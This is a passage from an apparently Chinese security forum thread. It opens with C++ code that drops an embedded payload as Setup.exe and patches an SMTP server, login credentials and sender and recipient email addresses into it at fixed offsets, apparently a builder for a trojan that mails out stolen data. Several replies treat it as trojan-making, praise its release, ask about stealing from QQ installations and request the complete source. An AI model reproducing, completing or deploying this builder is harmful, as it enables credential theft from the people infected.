	strcat(szDllPath,"\\Setup.exe");

	HANDLE hFile=::CreateFile(szDllPath,GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,
		NULL,CREATE_NEW,0,NULL);
	DWORD dwWriteByte;
	if(hFile!=NULL)
		::WriteFile(hFile,lpVoid,dwSize,&dwWriteByte,NULL);

	LONG dwAddress=0;
	DWORD dwWrite;

	UpdateData(TRUE);

	char sz0[20]={0};

	dwAddress=0x3018;
	SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
	WriteFile(hFile,sz0,20,&dwWrite,NULL);
	SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
	WriteFile(hFile,m_SmtpServer,m_SmtpServer.GetLength(),&dwWrite,NULL);

	dwAddress=0x3080;
	SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
	WriteFile(hFile,sz0,20,&dwWrite,NULL);
	SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
	WriteFile(hFile,m_UserName,m_UserName.GetLength(),&dwWrite,NULL);

	dwAddress=0x30E8;
	SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
	WriteFile(hFile,sz0,20,&dwWrite,NULL);
	SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
	WriteFile(hFile,m_Password,m_Password.GetLength(),&dwWrite,NULL);

	dwAddress=0x3150;
	SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
	WriteFile(hFile,sz0,20,&dwWrite,NULL);
	SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
	WriteFile(hFile,m_SendMailAddress,m_SendMailAddress.GetLength(),&dwWrite,NULL);

	dwAddress=0x31B8;
	SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
	WriteFile(hFile,sz0,20,&dwWrite,NULL);
	SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
	WriteFile(hFile,m_RecvMailAddress,m_RecvMailAddress.GetLength(),&dwWrite,NULL);

	CloseHandle(hFile);
}
2010-11-1 20:48
0
hackqf
雪    币: 208
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
19
也来凑个热闹,看看马是怎么炼成的
2010-11-1 20:49
0
abgood
雪    币: 32
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
20
支持楼主的开源意识!!!
2010-11-1 20:50
0
thankme
雪    币: 219
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
21
支持楼主的开源意识!!!
2010-11-1 20:59
0
Erorr
雪    币: 82
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
22
如果QQ不是安装在Program Files目录里面,是不是就没用了
2010-11-1 22:41
0
邓韬
雪    币: 278
活跃值: (709)
能力值: ( LV15,RANK:520 )
在线值:
发帖
回帖
粉丝
私信
23
绝对顶啊暗暗暗暗
2010-11-1 23:01
0
邓韬
雪    币: 278
活跃值: (709)
能力值: ( LV15,RANK:520 )
在线值:
发帖
回帖
粉丝
私信
24
楼主发个完整的吧
2010-11-1 23:06
0
kkmylove
雪    币: 338
活跃值: (103)
能力值: ( LV7,RANK:110 )
在线值:
发帖
回帖
粉丝
私信
25
顶 啊 支持楼主发个完整的 谢了
2010-11-1 23:24
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回
//